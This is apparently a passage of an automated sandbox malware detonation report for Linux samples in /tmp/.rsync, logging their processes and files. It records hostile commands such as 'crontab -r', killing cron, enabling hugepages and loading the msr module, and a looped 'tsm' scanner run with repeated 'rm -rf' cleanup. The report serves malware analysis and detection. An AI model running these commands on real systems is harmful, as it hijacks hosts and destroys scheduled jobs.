[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsbe-20240611-en

Max time kernel

2s

Command Line

[/tmp/.rsync/c/golan]

Signatures

N/A

Processes

/tmp/.rsync/c/golan

[/tmp/.rsync/c/golan]

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-armhf-20240611-en

Max time kernel

17s

Command Line

[/tmp/.rsync/a/a]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/.rsync/a/upd /tmp/.rsync/a/upd N/A

Enumerates running processes

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /sbin/sysctl N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/devices/system/node /tmp/.rsync/a/a N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/150/cmdline /usr/bin/pkill N/A
File opened for reading /proc/22/stat /bin/ps N/A
File opened for reading /proc/138/status /bin/ps N/A
File opened for reading /proc/22/status /usr/bin/pkill N/A
File opened for reading /proc/700/cmdline /bin/ps N/A
File opened for reading /proc/314/status /bin/ps N/A
File opened for reading /proc/8/cmdline /usr/bin/pkill N/A
File opened for reading /proc/301/status /bin/ps N/A
File opened for reading /proc/6/cmdline /usr/bin/pkill N/A
File opened for reading /proc/275/cmdline /usr/bin/pkill N/A
File opened for reading /proc/690/cmdline /usr/bin/pkill N/A
File opened for reading /proc/29/stat /usr/bin/killall N/A
File opened for reading /proc/668/cmdline /bin/ps N/A
File opened for reading /proc/165/cmdline /bin/ps N/A
File opened for reading /proc/314/stat /bin/ps N/A
File opened for reading /proc/411/cmdline /bin/ps N/A
File opened for reading /proc/4/cmdline /usr/bin/pkill N/A
File opened for reading /proc/460/stat /usr/bin/killall N/A
File opened for reading /proc/217/stat /bin/ps N/A
File opened for reading /proc/691/cmdline /bin/ps N/A
File opened for reading /proc/699/cmdline /bin/ps N/A
File opened for reading /proc/41/stat /usr/bin/killall N/A
File opened for reading /proc/29/stat /bin/ps N/A
File opened for reading /proc/sys/kernel/osrelease /sbin/sysctl N/A
File opened for reading /proc/672/status /bin/ps N/A
File opened for reading /proc/13/cmdline /usr/bin/pkill N/A
File opened for reading /proc/147/status /usr/bin/pkill N/A
File opened for reading /proc/278/cmdline /bin/ps N/A
File opened for reading /proc/25/cmdline /usr/bin/pkill N/A
File opened for reading /proc/691/cmdline /usr/bin/pkill N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/97/stat /usr/bin/killall N/A
File opened for reading /proc/415/stat /usr/bin/killall N/A
File opened for reading /proc/701/status /bin/ps N/A
File opened for reading /proc/41/cmdline /usr/bin/pkill N/A
File opened for reading /proc/668/status /usr/bin/pkill N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/28/stat /bin/ps N/A
File opened for reading /proc/3/cmdline /usr/bin/pkill N/A
File opened for reading /proc/670/stat /usr/bin/killall N/A
File opened for reading /proc/sys/kernel/pid_max /bin/ps N/A
File opened for reading /proc/23/cmdline /bin/ps N/A
File opened for reading /proc/41/stat /bin/ps N/A
File opened for reading /proc/13/status /usr/bin/pkill N/A
File opened for reading /proc/4/cmdline /bin/ps N/A
File opened for reading /proc/643/cmdline /usr/bin/pkill N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/696/stat /bin/ps N/A
File opened for reading /proc/28/cmdline /usr/bin/pkill N/A
File opened for reading /proc/22/status /bin/ps N/A
File opened for reading /proc/41/cmdline /bin/ps N/A
File opened for reading /proc/461/cmdline /bin/ps N/A
File opened for reading /proc/646/stat /bin/ps N/A
File opened for reading /proc/672/status /usr/bin/pkill N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /bin/ps N/A
File opened for reading /proc/13/cmdline /bin/ps N/A
File opened for reading /proc/669/cmdline /bin/ps N/A
File opened for reading /proc/15/status /usr/bin/pkill N/A
File opened for reading /proc/275/status /usr/bin/pkill N/A
File opened for reading /proc/415/status /usr/bin/pkill N/A
File opened for reading /proc/147/stat /usr/bin/killall N/A
File opened for reading /proc/217/cmdline /bin/ps N/A
File opened for reading /proc/3/status /usr/bin/pkill N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/upd /tmp/.rsync/a/a N/A
File opened for modification /tmp/.rsync/a/.proc /tmp/.rsync/a/stop N/A
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/bash.pid /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/a N/A

Processes

/tmp/.rsync/a/a

[/tmp/.rsync/a/a]

/usr/bin/crontab

[crontab -r]

/bin/cat

[cat dir.dir]

/usr/bin/nproc

[nproc]

/sbin/sysctl

[sysctl -w vm.nr_hugepages=1]

/usr/bin/find

[find /sys/devices/system/node/node* -maxdepth 0 -type d]

/sbin/modprobe

[modprobe msr]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep AMD Ryzen]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep Intel]

/bin/chmod

[chmod u+x upd]

/bin/chmod

[chmod 777 a anacron cron dir.dir run stop upd]

/tmp/.rsync/a/upd

[./upd]

/tmp/.rsync/a/run

[./run]

/tmp/.rsync/a/stop

[./stop]

/usr/bin/pkill

[pkill -9 cron]

/usr/bin/killall

[killall -9 cron]

/bin/ps

[ps x]

/bin/grep

[grep cron]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/rm

[rm -rf .proc]

/bin/sleep

[sleep 10]

/bin/cat

[cat dir.dir]

/bin/uname

[uname -m]

Network

N/A

Files

/tmp/.rsync/a/dir.dir

MD5 b3d878adcf4672bbd1f31cffac10c769
SHA1 ce5798837933ece35a7e26a0a3dc06cab19c6275
SHA256 ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7
SHA512 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c

/tmp/.rsync/a/upd

MD5 a136fbe534c2487d3c89bd6a26847bd0
SHA1 11b9362ba79b67dd5d5baf7cf11e0003f049d6e0
SHA256 419a443ff93475ef3abb6e71e5a94e56aea8b7c1f1c4402b3662425815432d46
SHA512 85047cf9d22037d2581ae41275107b243c0bb3259b57fe46bd3fd04a1abe75a7fdeace8a9eae1fae31349a00183206b40259ab3957db8f4f16a79e67133485e9

/tmp/.rsync/a/bash.pid

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-armhf-20240611-en

Max time kernel

10s

Command Line

[/tmp/.rsync/a/run]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/bash.pid /tmp/.rsync/a/run N/A

Processes

/tmp/.rsync/a/run

[/tmp/.rsync/a/run]

/tmp/.rsync/a/stop

[./stop]

/bin/sleep

[sleep 10]

/bin/cat

[cat dir.dir]

/bin/uname

[uname -m]

Network

N/A

Files

/tmp/.rsync/a/dir.dir

MD5 b3d878adcf4672bbd1f31cffac10c769
SHA1 ce5798837933ece35a7e26a0a3dc06cab19c6275
SHA256 ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7
SHA512 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c

/tmp/.rsync/a/bash.pid

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsbe-20240611-en

Max time kernel

149s

Command Line

[/tmp/.rsync/c/go]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A

Processes

/tmp/.rsync/c/go

[/tmp/.rsync/c/go]

/bin/uname

[uname -m]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

